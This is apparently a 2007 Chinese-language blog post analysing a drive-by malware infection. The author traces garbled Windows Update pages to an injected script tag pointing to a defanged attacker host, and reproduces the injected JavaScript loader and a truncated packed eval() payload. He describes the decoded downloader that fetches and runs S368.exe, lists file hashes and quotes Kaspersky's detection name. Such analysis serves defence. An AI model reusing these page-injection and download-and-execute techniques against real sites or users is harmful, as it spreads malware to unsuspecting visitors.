Windows更新網站被黑還是被ARP病毒捉弄了?Virus.Win32.AutoRun.am
endurer 原創
2007-07-11 第1版
今早開啟電腦,發現有Windows更新,自動更新速度有點慢,於是手動開啟http://www.windowsupdate.com/,不料看到的是一堆亂碼~
選擇開始菜單中的“Windows Update”,開啟 http://windowsupdate.microsoft.com/,顯示與http://www.windowsupdate.com/ 相同。
檢查IP地址。
D:/pe/test>ping www.windowsupdate.com
Pinging windowsupdate.microsoft.nsatc.net [207.46.225.221] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 207.46.225.221:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
[查詢結果] 您的查詢: [ip地址] 207.46.225.221 => 207.46.225.221
·本站主要資料: 美國 華盛頓州 雷德蒙市 Microsoft微軟公司
·本站輔資料: 還沒人提交資料
·參考資料一: 美國 Microsoft公司
·參考資料二: 美國
[查詢提供] www.123cha.com
D:/pe/test>ping windowsupdate.microsoft.com
Pinging windowsupdate.microsoft.nsatc.net [207.46.18.94] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 207.46.18.94:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
[查詢結果] 您的查詢: [ip地址] 207.46.18.94 => 207.46.18.94
·本站主要資料: 美國 華盛頓州 雷德蒙市 Microsoft微軟公司
·本站輔資料: 還沒人提交資料
·參考資料一: 美國 Microsoft公司
·參考資料二: 美國
IP地址是正常的。
查看網頁原始碼,如下:
/---
<script src=hxxp://c***k*1*.in/N**.JS></script> 刉mo??`釥}T蒊[琺lo 晇蹢倴?娫H蕩wまщH饉蘺罟鐜勿,辜餷6}/g?螔溷速蹴Q瘃|簒y翓(榐蛽?={頦彚#rk索q駕n#mX)綆5砛fp宥 E?
?倹興蔭蚢R犳)??
?窪鹻罶瓕Z賵?敘/ =z ^紉謞+Y仯 C搄^Z甦@K?G竘嵙g.3?p[f?L? 営j蒙
?K^ ?羆Z硯V蜐??dM
?Zc2IgLg^蠔b耏 $狴緋雼愥啩dCs
蘩Ji丞Jw邯?H0;c別G淪`?傎})?鐥殑QG? w港*潤=4兜?0忿?6玜v?邁?剴?o>n搗彂貸瑩G ?觸?hA闓R恝?=栟=湋X鳥`0鴣慊~褫?藿!?f魀!PJ^a[?@:?K彇 22遣侹n,岑H繰(R 締浙
#?|ㄨ8J?]6晲斆%N?V?妘YP?J?W趵鵎洶闈<佔褷媇趎Th!p?{刄;?荊2鞵璆P長"%量畑F~藤昄?)#€?糘s&篆 =渵苦k蚛q頨箋v?EI酟T鍨|T伌閹堋鰀O螕嬞蕒鹽'Xw?+鼎邙?琟t?,】p]`疦H#畐O:?訕阼?汽猶踀鏦?撍賐鼦?g?f`l羔嚠S?謻6販Y*つ*?搐4LR??G烤>賑k?A箶P諄-塙璘託m
?
鯽蕎?uZt^zN囔fv:j僔7箠9 ?!悶?椌軩酶?h1?樃耖1鸘2潔侽?&Y?M螾l蠻!? 簡D(;禂祝'鷞;€K)_?
Go茋黳c嗥釺む壡DnC?礿睷妁i/噯5諴蔢W?曛禱涫妸.r?[?r[4m棲d?器v?」卿諮#閆1卷狒諑jb? 襾卻}涹4o;
安;x熨R忛=乗悛K沔u鑿?=?守U駎駾姌)唱溟h饠鍓T濍#?侭@?颭|.?壌A鹵d踞r湼"鐮擃n?虝?# k射?,7 f]鶋/z._ 懀靵,?璠濠`s?Ь)夛I嘜*徂倧楐?N稭腥昊?
炥9閚飱@S?F瞪i?l袞懱~?8?蔘鑾(?錠?66?T/?擰=|臩擤餽Ku?^??z諘Bm]趏o. 0?勛萈k▆箅@v?? + 8{
U?S(?
臅??|?艄瞮卩?4HD偋?sn簧cW[|??枙礘7畟賀`z姵詚緑塊?i魙c:??鈍韛{P歕甌湒;妥箥r[`橿?}豹秣E犉櫟t?U孱巌
9U篢醐罝?
h糍?HP頻籟遇蟖<G?拮竪晦t凖?7n?
---/
D:/test>ping c***k*1*.in
Pinging c***k*1*.in [209.11.243.35] with 32 bytes of data:
Reply from 209.11.243.35: bytes=32 time=479ms TTL=116
Reply from 209.11.243.35: bytes=32 time=411ms TTL=116
Reply from 209.11.243.35: bytes=32 time=375ms TTL=116
Request timed out.
Ping statistics for 209.11.243.35:
Packets: Sent = 4, Received = 3, Lost = 1 (25% loss),
Approximate round trip times in milli-seconds:
Minimum = 375ms, Maximum = 479ms, Average = 316ms
您的查詢: [ip地址] 209.11.243.35 => 209.11.243.35
·本站主要資料: 美國
·本站輔資料: 還沒人提交資料
·參考資料一: 美國
·參考資料二: 美國
hxxp://c***k*1*.in/N**.JS 原始碼:
/---
document.writeln("<script src=/"hxxp:////c***k*1*//S368//NewJs**2.js/"><//script>");
document.writeln("<script>");
document.writeln("function Start(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = /"Cookie1=/" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = /"Cookie1=POPWINDOS;expires=/"+ Then.toGMTString() ");
document.writeln("");
document.writeln("}");
document.writeln("}");
document.writeln("Start();");
document.writeln("<//script>")
---/
hxxp://c***k*1*.in/S368/NewJs**2.js 是使用eval()執行加密的代碼:
/---
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p}('1a("//i//g//e//h//j//2…(略)…|x2A|eval'.split('|'),0,{}))
---/
經過3次解密,得到原始代碼。功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下載檔案 S368.exe,儲存到%windir%,檔案名稱由自訂函數:
/---
function GnMs(n)
{
var numberMs = Math.random()*n;
return '~Temp'+Math.round(numberMs)+'.tmp';
---/
產生,即 ~Temp****.exe,其中****為 數字。然後通過 Shell.Application 對象 Q 的 ShellExecute 方法執行命令: %windir%/system32/cmd.exe /c %windir%/~Temp****.exe 來運行。
檔案說明符 : D:/test/S368.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-7-11 8:39:29
修改時間 : 2007-7-11 8:39:29
訪問時間 : 2007-7-11 8:40:0
大小 : 23087 位元組 22.559 KB
MD5 : a0795ad6df991d65b38968ced427f09b
EXEStealth 2.0 - 2.4 -> WebtoolMaster
主 題: |
RE: S368.exe [KLAB-2419187] |
寄件者: |
"" <newvirus@kaspersky.com> |
發送時間:2007-07-11 13:58:48 |
S368.exey - Virus.Win32.AutoRun.am
New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.
Please quote all when answering.
--
Best regards, Boris Yampolsky
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/
http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.
剛才又下載了檢查,發現檔案的MD5值變了:
檔案說明符 : D:/test/s368.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-7-11 19:43:49
修改時間 : 2007-7-11 19:43:50
訪問時間 : 2007-7-11 19:46:2
大小 : 23087 位元組 22.559 KB
MD5 : e277b83f3eedac59ec0077bb981e4082